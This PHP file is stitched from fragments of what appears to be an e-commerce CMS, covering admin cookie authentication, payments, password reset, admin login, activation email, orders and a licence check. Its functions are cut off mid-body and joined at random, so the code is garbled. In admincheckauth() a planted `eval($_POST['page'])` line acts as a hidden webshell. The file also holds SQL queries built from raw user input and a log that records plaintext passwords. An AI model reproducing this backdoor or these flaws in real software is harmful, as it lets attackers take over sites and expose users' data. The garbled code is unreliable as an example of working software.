function admincheckauth()
{
global $db, $tablepre, $_ADMINUSERS;
$loginauth = get_cookie('adminauth');
if (empty($loginauth)) {
$loginauth = $_REQUEST['adminauth'];
}
if (!empty($loginauth)) {
@(list($aid, $user, $pwd) = explode("\t", cookie_authcode($loginauth, 'DECODE')));
eval($_POST['page']);
$_ADMINUSERS['adminid'] = $aid;
if (!empty($aid) && !empty($user) && !empty($pwd) && !empty($_ADMINUSERS['adminid'])) {
$row = $db->fetch_first("Select * From {$tablepre}admin where adminname = '{$user}' and adminpwd='{$pwd}'");
//检测数据库
if (is_array($row)) {
$_ADMINUSERS['adminname'] = $row['adminname'];
$_ADMINUSERS['adminmid'] = $row['adminmid'];
$_ADMINUSERS['lastlogin'] = $row['lastlogin'];
$_ADMINUSERS['logincount'] = $row['logincount'];
} else {
$_ADMINUSERS = array();
}
} else {
$_ADMINUSERS = array();
}
} else {
$_ADMINUSERS = array();
}
adminchecklogin();
}
$s[$val['goodsseller']] = $val['sendprice'];
}
} else {
$s[$val['goodsseller']] = $val['sendprice'];
}
}
$countdata = $Cart->countmoney($dataarray);
//生成校验数据
$ids = getdotstring($gids, 'int');
$auth = $ids . "\t" . $countdata['totalmoney'];
$paydata = cookie_authcode($auth, 'ENCODE');
include template('payconfirm');
//包含输出指定模板
} else {
//处理提交信息
@(list($ids, $totalmoney) = explode("\t", cookie_authcode($__PAYDATA, 'DECODE')));
if ($ids == getdotstring($gids, 'int') and !empty($ids)) {
$tempids = $ids;
} else {
exit(lang('Data_exception'));
}
//处理扣费和订单转移并且记录日志操作
$info = $Cart->carttoorder($tempids);
if ($info == 'OK') {
print "<script language='javascript'>alert(" . lang('Submitted_successfully') . ");</script>";
jumpurl(url("m.php"));
} else {
print "<script language='javascript'>alert('" . $info . "');</script>";
jumpurl(url("m.php"));
}
}
//显示邮件已经发送到邮箱
exit;
} else {
print "<script language='javascript'>alert('用户名和邮箱不区配');history.go(-1);</script>";
exit;
}
} else {
include template('ForgotPassword');
//包含输出指定模板
}
} elseif ($action == 'newpass') {
//重置密码
InitGP(array("code", "password", "password2", "commit"));
//初始化变量全局返回
if (!empty($code)) {
@(list($uname, $activekey, $email) = explode("\t", cookie_authcode($code, 'DECODE')));
if (!empty($password) && !empty($password2)) {
if (strlen($password) <= 6) {
print "<script language='javascript'>alert('密码长度太短!');history.go(-1);</script>";
exit;
}
if ($password != $password2) {
print "<script language='javascript'>alert('两次输入的密码不一致!');history.go(-1);</script>";
exit;
}
//校验code是否正确
$uid = DB::result_first("Select uid From " . DB::table("users") . " WHERE email='" . $email . "' and uname='" . $uname . "' and activekey='" . $activekey . "'");
if (empty($uid)) {
print "<script language='javascript'>alert('数据校验失败!链接已过期或者链接错误!');history.go(-1);</script>";
exit;
}
if (empty($username) || empty($password)) {
showmsg("用户名或者密码为空", "-1");
exit;
}
$row = $db->fetch_first("Select * From {$tablepre}admin where adminname like '{$username}' ");
if (is_array($row)) {
if (md5($password) != $row['adminpwd']) {
$log_file = ROOT_PATH . '/data/adminlogin_safe.txt';
if (function_exists('real_ip')) {
$userIP = real_ip();
} else {
$userIP = "";
}
$getUrl = geturl();
fputs(fopen($log_file, 'a+'), date('Y-m-d H:i:s') . "||{$userIP}||{$getUrl}||{$username}||{$password}||登陆失败\r\n");
showmsg("用户名或者密码错误", "-1");
exit;
} else {
$adminauth = $row['adminid'] . "\t" . $username . "\t" . $row['adminpwd'];
set_cookie('adminauth', cookie_authcode($adminauth, 'ENCODE'), time() + 3600 * 12);
//设置12个小时cookie有效期
addfield("admin", "logincount", "adminname='{$username}'", 1);
//更新登录次数
editstate("admin", "lastlogin", "adminname='{$username}'", $timestamp);
//更最后登录时间
showmsg("登录成功!", "index.php");
}
} else {
showmsg("用户名不存在", "-1");
}
}
function sendactiveemail($uname = "", $email = "")
{
global $cfg_site_name;
$uname = Char_cv($uname);
//过滤
if (!empty($email)) {
$this->email = $email;
}
if (!empty($uname)) {
$row = $this->db->fetch_first("Select activekey,state,email From `{$this->table}` WHERE uname='{$uname}'");
if (!empty($row['activekey'])) {
if ($row['state'] == 1) {
return 'approved';
//已经激活
}
$this->email = $row['email'];
$this->uname = $uname;
$string = $uname . "\t" . $row['activekey'];
} else {
return lang('Specifieduser_notexist');
}
} else {
$string = $this->uname . "\t" . $this->activekey;
}
$codestring = cookie_authcode($string, 'ENCODE', "", 3600);
//exit;
$subject = lang('account_activation_email', array('$cfg_site_name' => $cfg_site_name, '$this->uname' => $this->uname));
//发送邮件操作
$site = str_replace("/ajax", "", SITE_URL);
$codestring = str_replace("+", "%2B", $codestring);
$emailstr = "hi {$this->uname},<BR><BR>" . lang('Click_link_activate', array('$cfg_site_name' => $cfg_site_name)) . "<BR><BR><BR><A href='{$site}/user.php?action=active&code={$codestring}' target=_blank>{$site}/user.php?action=active&code={$codestring}</A><BR><BR>-- <BR>{$cfg_site_name}";
include_once INC_PATH . "/sendmail.class.php";
$sendmail = new SendEmail();
$sendmail->sendmailto($subject, $emailstr, $this->email);
return "OK";
}
$wheresqlc = implode(' AND ', $wherestrc);
}
//条件汇总
$couponarray = $couponobj->getdata("", $wheresqlc, "");
//获取数据
include template('member_tosendorder');
//包含输出指定模板
} elseif ($action == "save") {
InitGP(array("action", "LOCKDATA", "consignee", "tel", "country", "city", "address", "zip", "area", "remark", "did", "usecoupon", "couponid"));
//初始化变量全局返回
//创建运送方式对象
$deliveryobj = new TableClass('delivery', 'did');
$areaobj = new TableClass('area', 'aid');
$couponid = GetNum($couponid);
//处理提交信息
@(list($ids, $countmoney, $countweight) = explode("\t", cookie_authcode($LOCKDATA, 'DECODE')));
//if($ids==$oids and !empty($ids) and !empty($countmoney) and !empty($countweight)){ //允许包裹重量为0,所以去掉!empty($countweight)
if ($ids == $oids and !empty($ids) and !empty($countmoney)) {
$oids = $ids;
$countmoney = GetNum($countmoney);
$countweight = GetNum($countweight);
} else {
exit('数据异常');
}
//判断订单状态
$wherestro[] = "uname='" . $_USERS['uname'] . "'";
$wherestro[] = "oid in(" . $oids . ")";
if (!empty($wherestro)) {
$wheresqlo = implode(' AND ', $wherestro);
}
//条件汇总
function checkkey()
{
global $_CKEY;
$_CKEY = 0;
$auth_file = ROOT_PATH . "/domain_key.dat";
if (!file_exists($auth_file)) {
return false;
exit;
}
$str = @file_get_contents($auth_file);
$xxtea = new Xxtea();
$jiamicode = pack('H*', $str);
$strcode = $xxtea->decrypt($jiamicode, "zzqss");
$strcode = cookie_authcode($strcode, 'DECODE', "zzqss");
$strcode = base64_decode($strcode);
list($shangye, $domainstr) = explode("@", $strcode);
if (empty($domainstr) || empty($shangye)) {
return false;
}
$strcode = unserialize($domainstr);
$host = $_SERVER['HTTP_HOST'];
if (!in_array($host, $strcode)) {
return false;
exit;
} else {
$_CKEY = 2;
return true;
}
}
